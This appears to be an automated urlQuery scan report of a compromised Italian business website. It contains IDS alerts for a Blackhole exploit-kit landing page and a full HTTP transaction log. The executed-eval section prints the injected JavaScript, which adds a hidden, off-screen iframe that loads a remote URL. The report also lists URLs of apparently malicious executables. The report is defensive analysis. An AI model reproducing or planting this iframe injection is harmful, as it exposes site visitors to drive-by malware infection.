Overview

URLhttp://engine-lab.it/
IP62.149.128.166
ASNAS31034 Aruba S.p.A.
Location Italy
Report completed2012-11-11 02:57:59 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-11 02:57:24 62.149.131.185 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 2)
2012-11-11 02:57:24 62.149.131.185 urlQuery Client1ET CURRENT_EVENTS Blackhole Landing Page Eval Variable Obfuscation 3
2012-11-11 02:57:26 204.9.163.204 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-11 02:57:24 62.149.131.185 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-11 02:57:24 62.149.131.185 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 62.149.128.166

Date Alerts / IDS URL IP
2013-03-29 22:47:011 / 7http://sunsetterraceguesthouse.com/index.php?option=com_content&view=category& (...)62.149.128.166
2013-03-29 15:48:430 / 1http://slideidentity.com/9cri.exe62.149.128.166
2013-03-28 10:10:520 / 4http://cinet.it/images/blank.gif62.149.128.166
2013-03-27 17:54:491 / 2http://rediarezzo.it/62.149.128.166
2013-03-27 17:52:360 / 3http://messnerbx.it/62.149.128.166
2013-03-27 02:40:291 / 2http://servihogar-cb.es/pagina2.html62.149.128.166

Last 6 reports on ASN: AS31034 Aruba S.p.A.

Date Alerts / IDS URL IP
2013-03-30 01:33:470 / 1http://www.eleonuccorini.com/images/logos.gif?1c56c=92860862.149.131.133
2013-03-30 01:33:440 / 1http://www.eleonuccorini.com/images/logos.gif?22738=141112062.149.131.133
2013-03-30 00:43:040 / 1http://primoweb.it/components/com_user/views/in.exe85.235.157.111
2013-03-30 00:41:000 / 2http://www.infolabsrl.it/coge7/setupcoge7.exe62.149.130.153
2013-03-30 00:13:410 / 2http://www.camea.it/gallery/index.html62.149.130.141
2013-03-30 00:07:521 / 6http://www.giochidelloca.it/62.149.140.44



JavaScript

Executed Scripts (5)


Executed Evals (2)

#1 JavaScript::Eval (size: 286, repeated: 1) - Alert detect on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://moreyfineart.com/xml.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 286) 

j % 3

Executed Writes (0)



HTTP Transactions (30)


Request Response 
GET / HTTP/1.1

Host: engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=iso-8859-1

Date: Sun, 11 Nov 2012 01:57:23 GMT
Server: Apache
Location: http://www.engine-lab.it/
Content-Length: 233
Connection: close
GET /images/sf1.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 313
Last-Modified: Tue, 16 Nov 2010 17:08:57 GMT
Accept-Ranges: bytes
Etag: "9a2956f4b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET / HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Sun, 11 Nov 2012 01:57:23 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 19664
Set-Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD; path=/
Cache-Control: private
GET /images/elab.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 10145
Last-Modified: Tue, 16 Nov 2010 17:09:37 GMT
Accept-Ranges: bytes
Etag: "ac14b8cb185cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /share/skypebuttons/js/skypeCheck.js HTTP/1.1

Host: download.skype.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Server: nginx
Content-Length: 21434
Last-Modified: Wed, 30 Jun 2010 10:22:10 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Date: Sun, 11 Nov 2012 01:57:24 GMT
Connection: keep-alive
GET /images/contatti1.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 25082
Last-Modified: Tue, 16 Nov 2010 17:09:03 GMT
Accept-Ranges: bytes
Etag: "2f5025f8b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/home1.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 24430
Last-Modified: Tue, 16 Nov 2010 17:09:07 GMT
Accept-Ranges: bytes
Etag: "7296d1fab085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/shop1.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 24658
Last-Modified: Tue, 16 Nov 2010 17:09:15 GMT
Accept-Ranges: bytes
Etag: "2f674cffb085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/clienti1.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 25395
Last-Modified: Tue, 16 Nov 2010 17:08:58 GMT
Accept-Ranges: bytes
Etag: "906d5cf5b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /urchin.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
 
HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 6847
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Fri, 09 Nov 2012 20:33:28 GMT
Expires: Fri, 23 Nov 2012 20:33:28 GMT
Vary: Accept-Encoding
Cache-Control: max-age=1209600, public
Age: 105836
Server: GFE/2.0
GET /images/img2.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 34179
Last-Modified: Tue, 16 Nov 2010 17:08:55 GMT
Accept-Ranges: bytes
Etag: "8a6c97f3b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/line1.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 324
Last-Modified: Tue, 16 Nov 2010 17:08:56 GMT
Accept-Ranges: bytes
Etag: "5a92bdf3b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/invia.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 786
Last-Modified: Thu, 18 Nov 2010 07:21:58 GMT
Accept-Ranges: bytes
Etag: "2cbb1949f186cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/rv.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 1489
Last-Modified: Tue, 16 Nov 2010 17:08:56 GMT
Accept-Ranges: bytes
Etag: "103f2bf4b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/uccello.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 26700
Last-Modified: Thu, 22 Dec 2011 16:16:18 GMT
Accept-Ranges: bytes
Etag: "a034759c5c0cc1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /__utm.gif?utmwv=1.4&utmn=1212871960&utmcs=windows-1252&utmsr=1176x885&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmcn=1&utmdt=..%3A%3A%20Engine!%20Lab%20-%20Informatica%20Siti%20internet%20Software%20%3A%3A..&utmhn=www.engine-lab.it&utmhid=2086350108&utmr=-&utmp=/&utmac=UA-3198903-3&utmcc=__utma%3D248128083.1212871960.1352599045.1352599045.1352599045.1%3B%2B__utmz%3D248128083.1352599045.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)%3B%2B HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=1.4&utmn=1212871960&utmcs=windows-1252&utmsr=1176x885&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmcn=1&utmdt=..%3A%3A%20Engine!%20Lab%20-%20Informatica%20Siti%20internet%20Software%20%3A%3A..&utmhn=www.engine-lab.it&utmhid=2086350108&utmr=-&utmp=/&utmac=UA-3198903-3&utmcc=__utma%3D248128083.1212871960.1352599045.1352599045.1352599045.1%3B%2B__utmz%3D248128083.1352599045.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)%3B%2B HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Fri, 09 Nov 2012 20:36:27 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 105658
Server: GFE/2.0
GET /images/skype.jpg HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 1754
Last-Modified: Mon, 31 Jan 2011 07:21:12 GMT
Accept-Ranges: bytes
Etag: "8012397017c1cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/dett.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 24576
Last-Modified: Tue, 16 Nov 2010 17:09:05 GMT
Accept-Ranges: bytes
Etag: "aeb870f9b085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/li.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 26739
Last-Modified: Tue, 16 Nov 2010 17:09:10 GMT
Accept-Ranges: bytes
Etag: "658826fcb085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /detection/detection_as3.swf HTTP/1.1

Host: api.skype.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
 
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Server: nginx
Date: Sun, 11 Nov 2012 01:57:25 GMT
Connection: keep-alive
Content-Length: 5935
Last-Modified: Fri, 03 Sep 2010 11:16:01 GMT
Accept-Ranges: bytes
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/xml

Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: "87de33-256-4cd617ed12480"
Accept-Ranges: bytes
Content-Length: 598
Date: Sun, 11 Nov 2012 01:57:26 GMT
Connection: keep-alive
GET /images/servizi1.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:23 GMT
Content-Length: 24684
Last-Modified: Tue, 16 Nov 2010 17:09:13 GMT
Accept-Ranges: bytes
Etag: "c7258feb085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /images/fb.png HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Sun, 11 Nov 2012 01:57:24 GMT
Content-Length: 28836
Last-Modified: Tue, 16 Nov 2010 17:09:06 GMT
Accept-Ranges: bytes
Etag: "61132dfab085cb1:359430"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
POST / HTTP/1.1

Host: ocsp.comodoca.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 116
Content-Type: application/ocsp-request
 
HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Sun, 11 Nov 2012 01:57:28 GMT
Server: Apache
Last-Modified: Sat, 10 Nov 2012 17:19:30 GMT
Expires: Wed, 14 Nov 2012 17:19:30 GMT
Etag: A54DDFA2EF51893807903D6AAF5BDF34373BC79F
Cache-Control: max-age=313921,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp1
Content-Length: 472
Connection: close
POST / HTTP/1.1

Host: ocsp.comodoca.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
 
HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Sun, 11 Nov 2012 01:57:28 GMT
Server: Apache
Last-Modified: Sat, 10 Nov 2012 23:54:58 GMT
Expires: Wed, 14 Nov 2012 23:54:58 GMT
Etag: C553E520ADBAC73A7CC27BB9DD588EE30D06E3A0
Cache-Control: max-age=337649,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp1
Content-Length: 471
Connection: close
GET /img/provider/it/seal-legs.png HTTP/1.1

Host: www.twago.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
 
HTTP/1.1 200 OK

Content-Type: image/png

Server: nginx/1.2.4
Date: Sun, 11 Nov 2012 01:57:03 GMT
Content-Length: 9847
Last-Modified: Wed, 07 Nov 2012 17:09:44 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes
GET /favicon.ico HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD; __utma=248128083.1212871960.1352599045.1352599045.1352599045.1; __utmb=248128083; __utmc=248128083; __utmz=248128083.1352599045.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Sun, 11 Nov 2012 01:57:28 GMT
Content-Length: 1635
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
GET /xml.php HTTP/1.1

Host: moreyfineart.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.engine-lab.it/
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Sun, 11 Nov 2012 01:57:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1

Host: www.engine-lab.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: ASPSESSIONIDACTQDDDT=JLBFDDGDJDNPOHNNBKMCCHDD; __utma=248128083.1212871960.1352599045.1352599045.1352599045.1; __utmb=248128083; __utmc=248128083; __utmz=248128083.1352599045.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
 
HTTP/1.1 404 Not Found

